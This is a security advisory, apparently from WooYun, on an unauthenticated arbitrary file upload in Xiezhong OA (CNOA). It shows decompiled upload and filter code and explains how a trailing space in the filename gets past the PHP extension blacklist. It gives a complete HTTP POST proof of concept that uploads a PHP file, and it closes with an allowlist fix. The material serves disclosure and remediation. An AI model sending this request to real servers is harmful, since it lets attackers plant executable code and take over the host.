
Xiezhong OA (协众OA) arbitrary file upload (no login required)

2014-10-11 23:25

The code is Zend-encrypted, but most of it can be decoded.

The web directory contains a configuration file, www\file\webcache\noNeedCheckPermitActionList.data.php.

Judging from the code logic, the controllers and methods listed in that file are the ones that do not require login authentication.

Among them is www\app\main\source\mainCommon.class.php:

public function actionUpfile( )
{
    global $CNOA_DB;
    $act = getpar( $_GET, "act", "" );
    @ini_set( "default_socket_timeout", "86400" );
    @ini_set( "max_input_time", "86400" );
    set_time_limit( 0 );
    $CNOA_FS = new fs( );
    // The extension is taken verbatim from the client-supplied file name.
    $file_ext = strtolower( strrchr( $_FILES['Filedata']['name'], "." ) );
    $file_name = $CNOA_FS->mkName( ).$file_ext;
    if ( $act == "upforhtmleditor" )
    {
        $savePath = CNOA_PATH_FILE."/common/upload/".date( "Y.m.d", $GLOBALS['CNOA_TIMESTAMP'] )."/";
        $viewPath = "{$GLOBALS['URL_FILE']}/common/upload/".date( "Y.m.d", $GLOBALS['CNOA_TIMESTAMP'] )."/";
        mkdirs( $savePath );
        $file_dst = $savePath.$file_name;
        // Blacklist check on the extension, see filterPHPFileUpload() below.
        filterphpfileupload( );
        @move_uploaded_file( @$_FILES['Filedata']['tmp_name'], $file_dst );
        // The web path of the stored file is returned to the caller.
        echo $viewPath.$file_name;
        exit( );
    }
    $file_dst = CNOA_PATH_FILE."/common/temp/".$file_name;
    filterphpfileupload( );
    @move_uploaded_file( @$_FILES['Filedata']['tmp_name'], $file_dst );
    echo $file_name;
    exit( );
}





$file_ext is taken directly from the uploaded file's extension, but a filterphpfileupload() function later checks the uploaded file. Following that function into www\core\inc\function.func.php:

function filterPHPFileUpload( )
{
    foreach ( $_FILES as $k => $v )
    {
        // Exact-match blacklist on the raw (untrimmed) extension.
        $ext = strtolower( strrchr( $v['name'], "." ) );
        if ( in_array( $ext, array( ".php", ".phpx", ".php3" ) ) )
        {
            $arr = array( );
            $arr['failure'] = TRUE;
            $arr['msg'] = "不允许上传php文件";
            echo json_encode( $arr );
            exit( );
            break;
        }
    }
}



Appending a space to the uploaded file name bypasses the check: in_array() compares the extension exactly, so ".php " does not match ".php", yet the same untrimmed string is appended to the stored name. Because the paths above are Windows paths, the trailing space is dropped when the file is written, and the file lands on disk with a .php extension.



PoC (no login required):



POST /index.php?action=upFile&act=upforhtmleditor HTTP/1.1
Host: oa.cnoa.cn
Proxy-Connection: keep-alive
Content-Length: 304
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCy4HVT4TPkeHYzqA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: CNOA_LOGIN_USERNAME=c1OiJhZG1pbiI7; CNOA_language=cn; CNOAOASESSID=ssddfhsd2diu71c2s9ss

------WebKitFormBoundaryCy4HVT4TPkeHYzqA
Content-Disposition: form-data; name="Filedata"; filename="1.php "
Content-Type: text/plain

<?php
phpinfo();
?>

------WebKitFormBoundaryCy4HVT4TPkeHYzqA
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryCy4HVT4TPkeHYzqA--

Proof of vulnerability:

http://oa.cnoa.cn/file/common/upload/2014.08.27/20140827181850_2e6b714026603a9b847b64d59f7c37d9.cnoa.php








[Screenshot: cnoa.PNG]



Fix:

trim() or a whitelist
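As an added example (not code from the CNOA product or from the original report), this is how the filter could be rewritten along the lines of the suggested fix: the client-supplied name is normalised with trim() before the extension is examined, and only an explicit allowlist of extensions is accepted. The allowlist contents and the helper names are assumptions.

```php
<?php
// Added example, not code from the CNOA product or the original report:
// an allowlist replacement for filterPHPFileUpload(). The client name is
// normalised before the extension is examined, so "1.php " no longer passes.

// Extensions the editor upload is allowed to store (assumed set).
const UPLOAD_ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip'];

// Return the normalised, allowlisted extension of $clientName, or null to reject.
function safeUploadExtension(string $clientName): ?string
{
    // Drop any directory part the client may have sent.
    $name = basename(str_replace('\\', '/', $clientName));
    // Strip surrounding whitespace, NUL bytes and trailing dots: Windows drops
    // trailing spaces/dots on write, which is what turned ".php " into ".php".
    $name = rtrim(trim($name), ". \t\n\r\0\x0B");
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!preg_match('/^[a-z0-9]+$/', $ext)) {
        return null;                       // empty or non-alphanumeric extension
    }
    return in_array($ext, UPLOAD_ALLOWED_EXT, true) ? $ext : null;
}

// Allowlist counterpart of filterPHPFileUpload(): returns the rejected field
// names instead of echoing and exiting, so the caller can refuse the request
// before move_uploaded_file() is reached. $files has the shape of $_FILES.
function filterUploadAllowlist(array $files): array
{
    $rejected = [];
    foreach ($files as $field => $f) {
        if (safeUploadExtension((string) $f['name']) === null) {
            $rejected[] = $field;
        }
    }
    return $rejected;
}

// Constructed sample names (not from the report) and the expected outcome.
$samples = ['1.php ' => null, '1.PHP' => null, 'shell.php.' => null,
            'a.jpg' => 'jpg', '../x.png ' => 'png', 'noext' => null];
foreach ($samples as $n => $expected) {
    $got = safeUploadExtension($n);
    if ($got !== $expected) {
        throw new RuntimeException("unexpected result for " . var_export($n, true));
    }
    printf("%-14s => %s\n", var_export($n, true), var_export($got, true));
}
$rejected = filterUploadAllowlist(['Filedata' => ['name' => '1.php ', 'tmp_name' => '/tmp/x']]);
printf("rejected fields: %s\n", implode(', ', $rejected));
```

The stored file name should still be generated server-side (as mkName() already does) with only the checked extension appended, so nothing from the client name reaches the filesystem.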

Source: www.wooyun.org/bugs/wooyun-2014-073972
